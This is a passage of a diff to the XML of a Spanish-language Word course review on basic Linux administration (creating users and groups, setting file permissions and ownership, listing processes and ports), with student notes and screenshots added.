--- a/MF0490_3 Gestión de servicios en el sistema informático/AMPLIACIONES/REPASO FINAL DE CURSO SEGURIDAD INFORMATICA/REPASO FINAL DE CURSO.docx
+++ b/MF0490_3 Gestión de servicios en el sistema informático/AMPLIACIONES/REPASO FINAL DE CURSO SEGURIDAD INFORMATICA/REPASO FINAL DE CURSO.docx
@@ -51,7 +51,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="1724182A">
-          <v:rect id="_x0000_i1481" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -94,27 +94,11 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>useradd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> alumno1</w:t>
+        <w:t>sudo useradd alumno1</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> alumno1</w:t>
+        <w:t>sudo passwd alumno1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -127,28 +111,13 @@
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>useradd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> crea el usuario y </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> le asigna contraseña.</w:t>
+        <w:t>useradd crea el usuario y passwd le asigna contraseña.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="5EBFC199">
-          <v:rect id="_x0000_i1482" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -191,62 +160,73 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>groupadd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> seguridad</w:t>
+        <w:t>sudo groupadd seguridad</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>usermod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aG</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> seguridad alumno1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+        <w:t>sudo usermod -aG seguridad alumno1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EC6A27B" wp14:editId="7553F75D">
+            <wp:extent cx="4476750" cy="2171700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="450288487" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="450288487" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4476750" cy="2171700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Explicación:</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aG</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> añade el usuario a un grupo sin eliminar otros.</w:t>
+        <w:t>-aG añade el usuario a un grupo sin eliminar otros.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="7D72E937">
-          <v:rect id="_x0000_i1483" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -266,19 +246,56 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>groups</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> alumno1</w:t>
+      <w:r>
+        <w:t>groups alumno1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40D11E89" wp14:editId="318D4A9B">
+            <wp:extent cx="2305050" cy="1133475"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="982267428" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="982267428" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2305050" cy="1133475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="3C69CCA1">
-          <v:rect id="_x0000_i1484" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -298,25 +315,141 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>mkdir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /home/alumno1/privado</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Antes tenemos que hacer lo siguiente</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sudo mkdir -p /home/alum</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>no1/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Si queremos cambiar el propietario</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sudo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>chown alumno1:alumno1 /home/alumno1/privado</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>despues</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>mkdir /home/alumno1/privado</w:t>
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chmod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 700 /home/alumno1/privado</w:t>
+        <w:t>chmod 700 /home/alumno1/privado</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -335,7 +468,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="41DC1AD3">
-          <v:rect id="_x0000_i1485" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -355,30 +488,58 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chown</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> alumno</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>1:seguridad</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> archivo.txt</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Crear con nano ese fichero</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nano archivo.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo chown alumno1:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>archivo.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="33FDDE6E">
-          <v:rect id="_x0000_i1486" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -398,13 +559,23 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chmod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 755 script.sh</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nano script.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>chmod 755 script.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -441,7 +612,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="2D4AEA45">
-          <v:rect id="_x0000_i1487" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -461,27 +632,29 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chmod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>u+x</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> archivo.sh</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nano archivo.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>chmod u+x archivo.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="2E0A1768">
-          <v:rect id="_x0000_i1488" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -501,19 +674,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> archivo.txt copia.txt</w:t>
+      <w:r>
+        <w:t>cp archivo.txt copia.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="5430CF6A">
-          <v:rect id="_x0000_i1489" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -533,80 +701,81 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -r carpeta1 carpeta2</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Mkdir carpeta1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Mkdir carpeta2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>cp -r carpeta1 carpeta2</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="6F91FF27">
-          <v:rect id="_x0000_i1490" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">10. Mover </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>archivo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>mv archivo.txt /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>/</w:t>
+          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>10. Mover archivo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>mv archivo.txt /tmp/</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="4EF67FB7">
-          <v:rect id="_x0000_i1491" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -626,19 +795,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> archivo.txt</w:t>
+      <w:r>
+        <w:t>rm archivo.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="618E75C2">
-          <v:rect id="_x0000_i1492" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -657,36 +821,8 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">12. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Buscar</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>archivos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>12. Buscar archivos</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -704,7 +840,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="31486AFE">
-          <v:rect id="_x0000_i1493" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -724,24 +860,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ps</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>ps aux</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="423D721B">
-          <v:rect id="_x0000_i1494" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -761,19 +887,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kill</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -9 PID</w:t>
+      <w:r>
+        <w:t>kill -9 PID</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="4A4F5BDC">
-          <v:rect id="_x0000_i1495" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -793,70 +914,125 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ss</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tuln</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>ss -tuln</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F3B2827" wp14:editId="1E0F0D56">
+            <wp:extent cx="5400040" cy="836295"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="425665072" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="425665072" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="836295"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="6183EFE5">
-          <v:rect id="_x0000_i1496" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">16. Alternativa </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>netstat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netstat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tuln</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>16. Alternativa netstat</w:t>
+      </w:r>
